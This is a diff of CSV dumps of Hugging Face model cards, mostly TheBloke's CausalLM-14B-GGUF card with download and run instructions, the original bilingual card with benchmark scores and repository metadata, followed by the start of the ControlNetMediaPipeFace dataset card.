+
<summary>More advanced huggingface-cli download usage</summary>
|
| 207 |
+
|
| 208 |
+
You can also download multiple files at once with a pattern:
|
| 209 |
+
|
| 210 |
+
```shell
|
| 211 |
+
huggingface-cli download TheBloke/CausalLM-14B-GGUF --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
|
| 212 |
+
```
|
| 213 |
+
|
| 214 |
+
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
|
| 215 |
+
|
| 216 |
+
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
|
| 217 |
+
|
| 218 |
+
```shell
|
| 219 |
+
pip3 install hf_transfer
|
| 220 |
+
```
|
| 221 |
+
|
| 222 |
+
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
|
| 223 |
+
|
| 224 |
+
```shell
|
| 225 |
+
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download TheBloke/CausalLM-14B-GGUF causallm_14b.Q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
|
| 226 |
+
```
|
| 227 |
+
|
| 228 |
+
Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
|
| 229 |
+
</details>
|
| 230 |
+
<!-- README_GGUF.md-how-to-download end -->
|
| 231 |
+
|
| 232 |
+
<!-- README_GGUF.md-how-to-run start -->
|
| 233 |
+
## Example `llama.cpp` command
|
| 234 |
+
|
| 235 |
+
Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
|
| 236 |
+
|
| 237 |
+
```shell
|
| 238 |
+
./main -ngl 32 -m causallm_14b.Q4_K_M.gguf --color -c 4096 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""<|im_start|>system\n{system_message}<|im_end|>\n<|im_start|>user\n{prompt}<|im_end|>\n<|im_start|>assistant""
|
| 239 |
+
```
|
| 240 |
+
|
| 241 |
+
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
|
| 242 |
+
|
| 243 |
+
Change `-c 4096` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically.
|
| 244 |
+
|
| 245 |
+
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
|
| 246 |
+
|
| 247 |
+
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
|
| 248 |
+
|
| 249 |
+
## How to run in `text-generation-webui`
|
| 250 |
+
|
| 251 |
+
Further instructions here: [text-generation-webui/docs/llama.cpp.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/llama.cpp.md).
|
| 252 |
+
|
| 253 |
+
## How to run from Python code
|
| 254 |
+
|
| 255 |
+
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries.
|
| 256 |
+
|
| 257 |
+
### How to load this model in Python code, using ctransformers
|
| 258 |
+
|
| 259 |
+
#### First install the package
|
| 260 |
+
|
| 261 |
+
Run one of the following commands, according to your system:
|
| 262 |
+
|
| 263 |
+
```shell
|
| 264 |
+
# Base ctransformers with no GPU acceleration
|
| 265 |
+
pip install ctransformers
|
| 266 |
+
# Or with CUDA GPU acceleration
|
| 267 |
+
pip install ctransformers[cuda]
|
| 268 |
+
# Or with AMD ROCm GPU acceleration (Linux only)
|
| 269 |
+
CT_HIPBLAS=1 pip install ctransformers --no-binary ctransformers
|
| 270 |
+
# Or with Metal GPU acceleration for macOS systems only
|
| 271 |
+
CT_METAL=1 pip install ctransformers --no-binary ctransformers
|
| 272 |
+
```
|
| 273 |
+
|
| 274 |
+
#### Simple ctransformers example code
|
| 275 |
+
|
| 276 |
+
```python
|
| 277 |
+
from ctransformers import AutoModelForCausalLM
|
| 278 |
+
|
| 279 |
+
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
|
| 280 |
+
llm = AutoModelForCausalLM.from_pretrained(""TheBloke/CausalLM-14B-GGUF"", model_file=""causallm_14b.Q4_K_M.gguf"", model_type=""llama"", gpu_layers=50)
|
| 281 |
+
|
| 282 |
+
print(llm(""AI is going to""))
|
| 283 |
+
```
|
| 284 |
+
|
| 285 |
+
## How to use with LangChain
|
| 286 |
+
|
| 287 |
+
Here are guides on using llama-cpp-python and ctransformers with LangChain:
|
| 288 |
+
|
| 289 |
+
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
|
| 290 |
+
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
|
| 291 |
+
|
| 292 |
+
<!-- README_GGUF.md-how-to-run end -->
|
| 293 |
+
|
| 294 |
+
<!-- footer start -->
|
| 295 |
+
<!-- 200823 -->
|
| 296 |
+
## Discord
|
| 297 |
+
|
| 298 |
+
For further support, and discussions on these models and AI in general, join us at:
|
| 299 |
+
|
| 300 |
+
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
|
| 301 |
+
|
| 302 |
+
## Thanks, and how to contribute
|
| 303 |
+
|
| 304 |
+
Thanks to the [chirper.ai](https://chirper.ai) team!
|
| 305 |
+
|
| 306 |
+
Thanks to Clay from [gpus.llm-utils.org](llm-utils)!
|
| 307 |
+
|
| 308 |
+
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
|
| 309 |
+
|
| 310 |
+
If you're able and willing to contribute it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
|
| 311 |
+
|
| 312 |
+
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
|
| 313 |
+
|
| 314 |
+
* Patreon: https://patreon.com/TheBlokeAI
|
| 315 |
+
* Ko-Fi: https://ko-fi.com/TheBlokeAI
|
| 316 |
+
|
| 317 |
+
**Special thanks to**: Aemon Algiz.
|
| 318 |
+
|
| 319 |
+
**Patreon special mentions**: Pierre Kircher, Stanislav Ovsiannikov, Michael Levine, Eugene Pentland, Andrey, 준교 김, Randy H, Fred von Graf, Artur Olbinski, Caitlyn Gatomon, terasurfer, Jeff Scroggin, James Bentley, Vadim, Gabriel Puliatti, Harry Royden McLaughlin, Sean Connelly, Dan Guido, Edmond Seymore, Alicia Loh, subjectnull, AzureBlack, Manuel Alberto Morcote, Thomas Belote, Lone Striker, Chris Smitley, Vitor Caleffi, Johann-Peter Hartmann, Clay Pascal, biorpg, Brandon Frisco, sidney chen, transmissions 11, Pedro Madruga, jinyuan sun, Ajan Kanaga, Emad Mostaque, Trenton Dambrowitz, Jonathan Leane, Iucharbius, usrbinkat, vamX, George Stoitzev, Luke Pendergrass, theTransient, Olakabola, Swaroop Kallakuri, Cap'n Zoog, Brandon Phillips, Michael Dempsey, Nikolai Manek, danny, Matthew Berman, Gabriel Tamborski, alfie_i, Raymond Fosdick, Tom X Nguyen, Raven Klaugh, LangChain4j, Magnesian, Illia Dulskyi, David Ziegler, Mano Prime, Luis Javier Navarrete Lozano, Erik Bjäreholt, 阿明, Nathan Dryer, Alex, Rainer Wilmers, zynix, TL, Joseph William Delisle, John Villwock, Nathan LeClaire, Willem Michiel, Joguhyik, GodLy, OG, Alps Aficionado, Jeffrey Morgan, ReadyPlayerEmma, Tiffany J. Kim, Sebastain Graf, Spencer Kim, Michael Davis, webtim, Talal Aujan, knownsqashed, John Detwiler, Imad Khwaja, Deo Leter, Jerry Meng, Elijah Stavena, Rooh Singh, Pieter, SuperWojo, Alexandros Triantafyllidis, Stephen Murray, Ai Maven, ya boyyy, Enrico Ros, Ken Nordquist, Deep Realms, Nicholas, Spiking Neurons AB, Elle, Will Dee, Jack West, RoA, Luke @flexchar, Viktor Bowallius, Derek Yates, Subspace Studios, jjj, Toran Billups, Asp the Wyvern, Fen Risland, Ilya, NimbleBox.ai, Chadd, Nitin Borwankar, Emre, Mandus, Leonard Tan, Kalila, K, Trailburnt, S_X, Cory Kujawski
|
| 320 |
+
|
| 321 |
+
|
| 322 |
+
Thank you to all my generous patrons and donaters!
|
| 323 |
+
|
| 324 |
+
And thank you again to a16z for their generous grant.
|
| 325 |
+
|
| 326 |
+
<!-- footer end -->
|
| 327 |
+
|
| 328 |
+
<!-- original-model-card start -->
|
| 329 |
+
# Original model card: CausalLM's CausalLM 14B
|
| 330 |
+
|
| 331 |
+

|
| 332 |
+
|
| 333 |
+
*Image drawn by GPT-4 DALL·E 3* TL;DR: Perhaps better than all existing models < 70B, in most quantitative evaluations...
|
| 334 |
+
|
| 335 |
+
# Please Stop Using WRONG unofficial quant models unless you know what you're doing
|
| 336 |
+
|
| 337 |
+
GPTQ quants require a good dataset for calibration, and the default C4 dataset is not capable.
|
| 338 |
+
|
| 339 |
+
**llama.cpp GGUF models**
|
| 340 |
+
GPT2Tokenizer fixed by [Kerfuffle](https://github.com/KerfuffleV2) on [https://github.com/ggerganov/llama.cpp/pull/3743](https://github.com/ggerganov/llama.cpp/pull/3743), new models to be reuploaded.
|
| 341 |
+
|
| 342 |
+
# Read Me:
|
| 343 |
+
|
| 344 |
+
Also see [7B Version](https://huggingface.co/CausalLM/7B)
|
| 345 |
+
|
| 346 |
+
This model was trained based on the model weights of Qwen (and LLaMA2 was used, yes, for calculating some initial weights), you may also need to comply with the commercial use restrictions of these two models depending on the situation. The training process utilized a model structure that was identical to LLaMA2, using the same attention calculation method as the original MHA LLaMA2 models, and no additional scaling applied to the Relative Positional Encoding (RoPE).
|
| 347 |
+
|
| 348 |
+
We manually curated a SFT dataset of 1.3B tokens for training, utilizing open source datasets from Hugging Face. For most of these sentences, we performed manual or synthetic rewrites and generated alternate language versions using larger language models. Additionally, we conducted augmented text training using carefully selected entries from Wikipedia, as well as featured entries from Fandom and filtered entries from Moegirlpedia. In order to strike a balance between efficiency and quality, 100% of the data used for training was synthetic data, no direct use of text from the internet or original texts from publicly available datasets was employed for fine-tuning.
|
| 349 |
+
|
| 350 |
+
The 7B version of the model is a distilled version of the 14B model, specifically designed for speculative sampling. Therefore, it is important to exercise caution when directly using the model, as it may produce hallucinations or unreliable outputs.
|
| 351 |
+
|
| 352 |
+
Please note that the model was trained on unfiltered internet data. Since we do not have the capacity to vet all of it, there may be a substantial amount of objectionable content, pornography, violence, and offensive language present that we are unable to remove. Therefore, you will still need to complete your own checks on the model's safety and filter keywords in the output. Due to computational resource constraints, we are presently unable to implement RLHF for the model's ethics and safety, nor training on SFT samples that refuse to answer certain questions for restrictive fine-tuning.
|
| 353 |
+
|
| 354 |
+
Bonus: The model underwent some fine-tuning on the prompt format introduced in LLaVA1.5 that is unrelated to image attention calculation. Therefore, aligning the ViT Projection module with frozen LM under visual instructions would enable rapid implementation of effective multimodal capabilities.
|
| 355 |
+
|
| 356 |
+
## PROMPT FORMAT:
|
| 357 |
+
[chatml](https://github.com/openai/openai-python/blob/main/chatml.md)
|
| 358 |
+
|
| 359 |
+
**System Prompt must not be empty!**
|
| 360 |
+
|
| 361 |
+
## MMLU:
|
| 362 |
+
stem ACC: 64.19
|
| 363 |
+
|
| 364 |
+
Humanities ACC: 61.40
|
| 365 |
+
|
| 366 |
+
other ACC: 71.64
|
| 367 |
+
|
| 368 |
+
social ACC: 75.37
|
| 369 |
+
|
| 370 |
+
**AVERAGE ACC:67.36** (Outperforms ALL models under 70B, very close to those best 70B fine-tunes)
|
| 371 |
+
|
| 372 |
+
|
| 373 |
+
## CEval (Val):
|
| 374 |
+
STEM ACC: 66.71
|
| 375 |
+
|
| 376 |
+
Social Science ACC: 85.10
|
| 377 |
+
|
| 378 |
+
Humanities ACC: 76.68
|
| 379 |
+
|
| 380 |
+
Other ACC: 70.23
|
| 381 |
+
|
| 382 |
+
Hard ACC:54.71
|
| 383 |
+
|
| 384 |
+
**AVERAGE ACC:73.10** (Outperforms Qwen-14B, and GPT-4)
|
| 385 |
+
|
| 386 |
+
## GSM8K
|
| 387 |
+
|
| 388 |
+
**Zero-shot ACC 0.7012888551933283** (Outperforms MetaMath-13B, Qwen-14B)
|
| 389 |
+
|
| 390 |
+
## AlpacaEval Leaderboard
|
| 391 |
+
| | win_rate | standard_error | n_wins | n_wins_base | n_draws | n_total | mode | avg_length |
|
| 392 |
+
| ------------ | -------- | -------------- | ------ | ----------- | ------- | ------- | --------- | ---------- |
|
| 393 |
+
| causallm-14b | **88.26087** | 1.116333 | 705 | 89 | 11 | 805 | community | 1391 |
|
| 394 |
+
|
| 395 |
+
|
| 396 |
+
Win rate **88.26%** on [AlpacaEval Leaderboard](https://tatsu-lab.github.io/alpaca_eval/) [view raw](https://github.com/tatsu-lab/alpaca_eval/blob/3a47dcd81c56f6a8e6a5711f2754013919fbe90a/results/causallm-14b/model_outputs.json)
|
| 397 |
+
|
| 398 |
+
**GPT2Tokenizer 上的 llama.cpp 存在一些问题,会尽快修复...**
|
| 399 |
+
|
| 400 |
+
**llama.cpp GGUF models**
|
| 401 |
+
GPT2Tokenizer 支持由 [Kerfuffle](https://github.com/KerfuffleV2) 修复于 [https://github.com/ggerganov/llama.cpp/pull/3743](https://github.com/ggerganov/llama.cpp/pull/3743),新模型稍后上传。
|
| 402 |
+
|
| 403 |
+
## 请读我:
|
| 404 |
+
|
| 405 |
+
另请参阅[7B版本](https://huggingface.co/CausalLM/7B)
|
| 406 |
+
|
| 407 |
+
该模型是基于Qwen的权重(并使用了LLaMA2权重,是的,用于计算一些权重初始化),您根据情况可能还需要遵守这两个模型的商业使用限制。训练过程中使用了与LLaMA2相同的模型结构,使用原始MHA LLaMA2模型的相同注意力计算方法,对相对位置编码(RoPE)没有进行额外的缩放。
|
| 408 |
+
|
| 409 |
+
我们手动筛选了一个包含13亿个标记的SFT数据集进行训练,利用了Hugging Face的开源数据集。对于大多数句子,我们进行了手动或合成改写,并使用更大的语言模型生成了其他语言版本。此外,我们还使用了精心挑选的来自维基百科的条目、来自Fandom的精选条目以及来自萌娘百科的过滤条目进行增强文本训练。为了在效率和质量之间取得平衡,训练所使用的100%数据都是合成数据,没有直接使用来自互联网或公开可用数据集的原始文本进行微调。
|
| 410 |
+
|
| 411 |
+
7B版本的模型是14B模型的精简版本,专门设计用于推测抽样。因此,在直接使用模型时,需要谨慎行事,因为它可能会产生幻觉或不可靠的输出。
|
| 412 |
+
|
| 413 |
+
请注意,模型是在未经过滤的互联网数据上进行训练的。由于我们无法审核所有数据,可能会出现大量不良内容、色情、暴力和冒犯性语言,我们无法删除这些内容。因此,您仍然需要对模型的安全性进行自己的检查,并对输出中的关键词进行过滤。由于计算资源的限制,我们目前无法为模型的伦理和安全实施RLHF,也无法对拒绝回答某些问题的SFT样本进行训练以进行限制性微调。
|
| 414 |
+
|
| 415 |
+
额外奖励:模型在LLaVA1.5中引入的提示格式上进行了一些微调,与图像注意力计算无关。因此,将ViT投影模块与冻结的LM对齐,并根据视觉指令实施快速实现有效的多模态能力。
|
| 416 |
+
|
| 417 |
+
## 提示格式:
|
| 418 |
+
[chatml](https://github.com/openai/openai-python/blob/main/chatml.md)
|
| 419 |
+
|
| 420 |
+
**系统提示不能为空!**
|
| 421 |
+
|
| 422 |
+
|
| 423 |
+
## MMLU:
|
| 424 |
+
STEM准确率:64.19
|
| 425 |
+
|
| 426 |
+
人文及艺术学科准确率:61.40
|
| 427 |
+
|
| 428 |
+
其他学科准确率:71.64
|
| 429 |
+
|
| 430 |
+
社会学科准确率:75.37
|
| 431 |
+
|
| 432 |
+
**平均准确率:67.36**(超过所有70B以下的模型,非常接近最佳70B微调模型)
|
| 433 |
+
|
| 434 |
+
## CEval(验证集):
|
| 435 |
+
STEM准确率:66.71
|
| 436 |
+
|
| 437 |
+
社会科学准确率:85.10
|
| 438 |
+
|
| 439 |
+
人文学科准确率:76.68
|
| 440 |
+
|
| 441 |
+
其他学科准确率:70.23
|
| 442 |
+
|
| 443 |
+
困难准确率:54.71
|
| 444 |
+
|
| 445 |
+
**平均准确率:73.10**(超过Qwen-14B和GPT-4)
|
| 446 |
+
|
| 447 |
+
## GSM8K
|
| 448 |
+
|
| 449 |
+
**零样本准确率0.7012888551933283**(超过MetaMath-13B和Qwen-14B)
|
| 450 |
+
|
| 451 |
+
## AlpacaEval Leaderboard
|
| 452 |
+
| | win_rate | standard_error | n_wins | n_wins_base | n_draws | n_total | mode | avg_length |
|
| 453 |
+
| ------------ | -------- | -------------- | ------ | ----------- | ------- | ------- | --------- | ---------- |
|
| 454 |
+
| causallm-14b | **88.26087** | 1.116333 | 705 | 89 | 11 | 805 | community | 1391 |
|
| 455 |
+
|
| 456 |
+
在 [AlpacaEval Leaderboard](https://tatsu-lab.github.io/alpaca_eval/) 胜率 **88.26%** [view raw](https://github.com/tatsu-lab/alpaca_eval/blob/3a47dcd81c56f6a8e6a5711f2754013919fbe90a/results/causallm-14b/model_outputs.json)
|
| 457 |
+
|
| 458 |
+
<!-- original-model-card end -->
|
| 459 |
+
","{""id"": ""TheBloke/CausalLM-14B-GGUF"", ""author"": ""TheBloke"", ""sha"": ""fe9e233d83851a081204be55a8812bb4af1da2f9"", ""last_modified"": ""2023-10-23 14:08:54+00:00"", ""created_at"": ""2023-10-22 16:28:29+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 4660, ""downloads_all_time"": null, ""likes"": 185, ""library_name"": ""transformers"", ""gguf"": {""total"": 14166676480, ""architecture"": ""llama"", ""context_length"": 8192}, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""gguf"", ""llama"", ""llama2"", ""qwen"", ""text-generation"", ""en"", ""zh"", ""dataset:JosephusCheung/GuanacoDataset"", ""dataset:Open-Orca/OpenOrca"", ""dataset:stingning/ultrachat"", ""dataset:meta-math/MetaMathQA"", ""dataset:liuhaotian/LLaVA-Instruct-150K"", ""dataset:jondurbin/airoboros-3.1"", ""dataset:WizardLM/WizardLM_evol_instruct_V2_196k"", ""dataset:RyokoAI/ShareGPT52K"", ""dataset:RyokoAI/Fandom23K"", ""dataset:milashkaarshif/MoeGirlPedia_wikitext_raw_archive"", ""dataset:wikipedia"", ""dataset:wiki_lingua"", ""dataset:fnlp/moss-003-sft-data"", ""dataset:garage-bAInd/Open-Platypus"", ""dataset:LDJnr/Puffin"", ""dataset:openbmb/llava_zh"", ""dataset:BAAI/COIG"", ""dataset:TigerResearch/tigerbot-zhihu-zh-10k"", ""dataset:liwu/MNBVC"", ""dataset:teknium/openhermes"", ""base_model:CausalLM/14B"", ""base_model:quantized:CausalLM/14B"", ""license:wtfpl"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: CausalLM/14B\ndatasets:\n- JosephusCheung/GuanacoDataset\n- Open-Orca/OpenOrca\n- stingning/ultrachat\n- meta-math/MetaMathQA\n- liuhaotian/LLaVA-Instruct-150K\n- jondurbin/airoboros-3.1\n- WizardLM/WizardLM_evol_instruct_V2_196k\n- RyokoAI/ShareGPT52K\n- RyokoAI/Fandom23K\n- milashkaarshif/MoeGirlPedia_wikitext_raw_archive\n- wikipedia\n- wiki_lingua\n- fnlp/moss-003-sft-data\n- garage-bAInd/Open-Platypus\n- LDJnr/Puffin\n- openbmb/llava_zh\n- BAAI/COIG\n- TigerResearch/tigerbot-zhihu-zh-10k\n- liwu/MNBVC\n- teknium/openhermes\nlanguage:\n- en\n- zh\nlicense: wtfpl\nmodel_name: CausalLM 14B\npipeline_tag: text-generation\ntags:\n- llama\n- llama2\n- qwen\ninference: false\nmodel_creator: CausalLM\nmodel_type: llama\nprompt_template: '<|im_start|>system\n\n {system_message}<|im_end|>\n\n <|im_start|>user\n\n {prompt}<|im_end|>\n\n <|im_start|>assistant\n\n '\nquantized_by: TheBloke"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""model_type"": ""llama""}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Notice', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='USE_POLICY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q4_0.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q4_1.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q5_0.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q5_1.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='causallm_14b.Q8_0.gguf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Limour/llama-python-streamingllm"", ""NLPark/llama-python-streamingllm""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-10-23 14:08:54+00:00"", ""cardData"": ""base_model: CausalLM/14B\ndatasets:\n- JosephusCheung/GuanacoDataset\n- Open-Orca/OpenOrca\n- stingning/ultrachat\n- meta-math/MetaMathQA\n- liuhaotian/LLaVA-Instruct-150K\n- jondurbin/airoboros-3.1\n- WizardLM/WizardLM_evol_instruct_V2_196k\n- RyokoAI/ShareGPT52K\n- RyokoAI/Fandom23K\n- milashkaarshif/MoeGirlPedia_wikitext_raw_archive\n- wikipedia\n- wiki_lingua\n- fnlp/moss-003-sft-data\n- garage-bAInd/Open-Platypus\n- LDJnr/Puffin\n- openbmb/llava_zh\n- BAAI/COIG\n- TigerResearch/tigerbot-zhihu-zh-10k\n- liwu/MNBVC\n- teknium/openhermes\nlanguage:\n- en\n- zh\nlicense: wtfpl\nmodel_name: CausalLM 14B\npipeline_tag: text-generation\ntags:\n- llama\n- llama2\n- qwen\ninference: false\nmodel_creator: CausalLM\nmodel_type: llama\nprompt_template: '<|im_start|>system\n\n {system_message}<|im_end|>\n\n <|im_start|>user\n\n {prompt}<|im_end|>\n\n <|im_start|>assistant\n\n '\nquantized_by: TheBloke"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""65354dada2c81a3d29a30494"", ""modelId"": ""TheBloke/CausalLM-14B-GGUF"", ""usedStorage"": 105562002400}",0,,0,,0,,0,,0,"Limour/llama-python-streamingllm, NLPark/llama-python-streamingllm, huggingface/InferenceSupport/discussions/new?title=TheBloke/CausalLM-14B-GGUF&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTheBloke%2FCausalLM-14B-GGUF%5D(%2FTheBloke%2FCausalLM-14B-GGUF)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",3
|
ClinicalBERT_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
CodeLlama-7b-hf_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
ControlNetMediaPipeFace_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv
ADDED
|
@@ -0,0 +1,213 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
CrucibleAI/ControlNetMediaPipeFace,"---
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
thumbnail: ''
|
| 6 |
+
tags:
|
| 7 |
+
- controlnet
|
| 8 |
+
- laion
|
| 9 |
+
- face
|
| 10 |
+
- mediapipe
|
| 11 |
+
- image-to-image
|
| 12 |
+
license: openrail
|
| 13 |
+
base_model: stabilityai/stable-diffusion-2-1-base
|
| 14 |
+
datasets:
|
| 15 |
+
- LAION-Face
|
| 16 |
+
- LAION
|
| 17 |
+
pipeline_tag: image-to-image
|
| 18 |
+
---
|
| 19 |
+
|
| 20 |
+
# ControlNet LAION Face Dataset
|
| 21 |
+
|
| 22 |
+
## Table of Contents:
|
| 23 |
+
- Overview: Samples, Contents, and Construction
|
| 24 |
+
- Usage: Downloading, Training, and Inference
|
| 25 |
+
- License
|
| 26 |
+
- Credits and Thanks
|
| 27 |
+
|
| 28 |
+
# Overview:
|
| 29 |
+
|
| 30 |
+
This dataset is designed to train a ControlNet with human facial expressions. It includes keypoints for pupils to allow gaze direction. Training has been tested on Stable Diffusion v2.1 base (512) and Stable Diffusion v1.5.
|
| 31 |
+
|
| 32 |
+
## Samples:
|
| 33 |
+
|
| 34 |
+
Cherry-picked from ControlNet + Stable Diffusion v2.1 Base
|
| 35 |
+
|
| 36 |
+
|Input|Face Detection|Output|
|
| 37 |
+
|:---:|:---:|:---:|
|
| 38 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/happy_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/happy_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/happy_result.png"">|
|
| 39 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/neutral_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/neutral_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/neutral_result.png"">|
|
| 40 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sad_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sad_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/sad_result.png"">|
|
| 41 |
+
|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/screaming_source.jpg"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/screaming_annotation.png"">|<img src=""https://huggingface.co/CrucibleAI/ControlNetMediaPipeFace/resolve/main/samples_laion_face_dataset/screaming_result.png"">|
|
| 42 |
+
